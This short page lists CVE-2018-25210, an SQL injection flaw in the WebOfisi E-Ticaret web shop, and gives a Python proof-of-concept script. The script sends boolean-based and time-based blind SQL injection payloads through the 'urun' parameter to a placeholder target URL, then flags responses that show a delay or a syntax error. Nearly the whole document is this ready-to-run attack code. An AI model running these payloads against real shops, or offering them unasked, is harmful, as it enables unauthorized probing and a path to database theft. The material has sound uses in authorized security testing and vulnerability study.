CVE-2018-25210 WebOfisi E-Ticaret SQL注入漏洞

import requests # Target URL example, replace with actual vulnerable endpoint target_url = "http://target.com/vulnerable_page" # The vulnerable parameter is 'urun' payloads = [ "1' AND 1=1-- -", # Boolean-based True "1' AND 1=2-- -", # Boolean-based False "1' OR SLEEP(5)-- -" # Time-based blind ] headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" } for payload in payloads: params = { "urun": payload } try: # Send GET request with the payload response = requests.get(target_url, params=params, headers=headers, timeout=10) print(f"Testing payload: {payload}") print(f"Status Code: {response.status_code}") print(f"Response Length: {len(response.text)}") # Analyze response differences to confirm vulnerability if "syntax error" in response.text.lower() or response.elapsed.total_seconds() > 5: print("[+] Potential Vulnerability Detected") print("-" * 30) except requests.RequestException as e: print(f"Error: {e}")